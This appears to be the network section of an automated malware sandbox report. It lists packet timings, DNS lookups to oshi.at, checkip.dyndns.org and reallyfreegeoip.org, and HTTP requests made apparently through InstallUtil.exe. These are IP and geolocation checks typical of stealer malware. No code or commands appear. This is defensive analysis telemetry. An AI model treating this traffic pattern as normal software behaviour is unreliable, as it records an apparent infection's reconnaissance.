                                                                                                                                Dec 3, 2024 15:20:46.356658936 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.356745958 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.370249987 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.370349884 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.371870041 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.371923923 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.373301029 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.373351097 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.375106096 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.375160933 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.377343893 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.377401114 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.378756046 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.378810883 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.380693913 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.380760908 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.382992029 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.383050919 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.384217978 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.384303093 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.386444092 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.386501074 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.388416052 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.388473988 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.389740944 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.389795065 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.391930103 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.391983032 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.393989086 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.394046068 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.395322084 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.395371914 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.396275997 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.396321058 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.397480011 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.397532940 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.399756908 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.399807930 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.401808023 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.401859999 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.403034925 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.403083086 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.405647993 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.405702114 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.406924009 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.406974077 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.407946110 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.409161091 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.409212112 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.409224987 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.409260988 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.552195072 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.552320957 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.553641081 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.553698063 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.555793047 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.555864096 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.558254004 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.558320999 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.559509993 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.559570074 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.562634945 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.562700033 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.564702988 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.564759016 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.566731930 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.566797018 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.568829060 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.568890095 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.570260048 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.570322990 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.581357956 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.581440926 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.583476067 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.583533049 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.584722996 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.584786892 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.587002993 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.587059021 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.589164972 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.589230061 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.590318918 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.590367079 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.592339993 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.592403889 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.592509031 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.592549086 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.594521999 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.594575882 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.596748114 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.596805096 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.598014116 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.598057985 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.600351095 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.600399971 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.602547884 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.602596045 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.603663921 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.603724957 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.606043100 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.606093884 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.607867002 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.607914925 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.609266996 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.609318018 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.611430883 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.611489058 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.613401890 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.613455057 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.616007090 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.616072893 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.617373943 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.617430925 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.618602991 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.618658066 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.761796951 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.761964083 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.763174057 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.763257027 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.763282061 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.764935017 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.765002012 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.765023947 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.766453981 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.766536951 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.766551971 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.768709898 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.768784046 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.768810034 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.771231890 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.771321058 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.771343946 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.773123980 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.773186922 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.773210049 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.776201010 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.776256084 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.776307106 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.777532101 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.777586937 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.778793097 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.779999018 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.780077934 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.780092955 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.780579090 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.791368008 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.791467905 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.793035984 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.793102026 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.795114040 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.795185089 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.796315908 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.796380043 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.798629999 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.798710108 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.800633907 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.800704956 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.802447081 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.802515984 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.804275036 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.804342031 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.806111097 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.806175947 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.807399988 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.807462931 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.809632063 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.809696913 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.811661959 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.811728954 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.813913107 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.813975096 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.815129042 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.815181971 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.817174911 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.817229033 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.819529057 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.819600105 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.820564032 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.820619106 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.821799040 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.821857929 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.824055910 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.824143887 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.826153994 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.826222897 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.827749968 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.827825069 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.828984976 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.829035044 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.829042912 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.829056025 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.829098940 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.832222939 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:58.062992096 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:58.183089018 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:58.183175087 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:58.183485985 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:58.303911924 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:59.593034983 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:59.596626043 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:59.717971087 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.048166037 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.049962997 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:00.050019026 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.050107956 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:00.053678036 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:00.053687096 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.094888926 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:21:01.266284943 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.266417980 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.268065929 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.268074036 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.268357038 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.313615084 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.321063042 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.363337994 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.728430986 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.728507042 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.728586912 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.772917032 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:40.597083092 CET8049716132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:40.597162008 CET4971680192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:22:05.047667980 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:22:05.047827959 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:22:15.610801935 CET4971680192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:22:15.731159925 CET8049716132.226.247.73192.168.2.5
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 3, 2024 15:20:12.355086088 CET5588653192.168.2.51.1.1.1
                                                                                                                                Dec 3, 2024 15:20:12.493947029 CET53558861.1.1.1192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:33.305583954 CET4992353192.168.2.51.1.1.1
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET53499231.1.1.1192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:35.598103046 CET6006153192.168.2.51.1.1.1
                                                                                                                                Dec 3, 2024 15:20:35.736640930 CET53600611.1.1.1192.168.2.5
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 3, 2024 15:20:12.355086088 CET192.168.2.51.1.1.10x5c60Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.305583954 CET192.168.2.51.1.1.10xbe39Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:35.598103046 CET192.168.2.51.1.1.10xac62Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 3, 2024 15:20:12.493947029 CET1.1.1.1192.168.2.50x5c60No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:12.493947029 CET1.1.1.1192.168.2.50x5c60No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET1.1.1.1192.168.2.50xbe39No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET1.1.1.1192.168.2.50xbe39No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET1.1.1.1192.168.2.50xbe39No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET1.1.1.1192.168.2.50xbe39No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET1.1.1.1192.168.2.50xbe39No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:33.443089962 CET1.1.1.1192.168.2.50xbe39No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:35.736640930 CET1.1.1.1192.168.2.50xac62No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                Dec 3, 2024 15:20:35.736640930 CET1.1.1.1192.168.2.50xac62No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                • oshi.at
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • checkip.dyndns.org
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549716132.226.247.73806780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 3, 2024 15:20:33.569812059 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 3, 2024 15:20:34.877834082 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:34 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 4a77274968f715a9c22a6eb08c80dfb3
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                Dec 3, 2024 15:20:35.169812918 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 3, 2024 15:20:35.596517086 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:35 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: f9e7113a1d6996db4cb8aa77f981df51
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549774132.226.247.73804956C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 3, 2024 15:20:58.183485985 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 3, 2024 15:20:59.593034983 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:59 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 464808c5700cfd7cbd5eb5838e83e80b
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                Dec 3, 2024 15:20:59.596626043 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 3, 2024 15:21:00.048166037 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:59 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
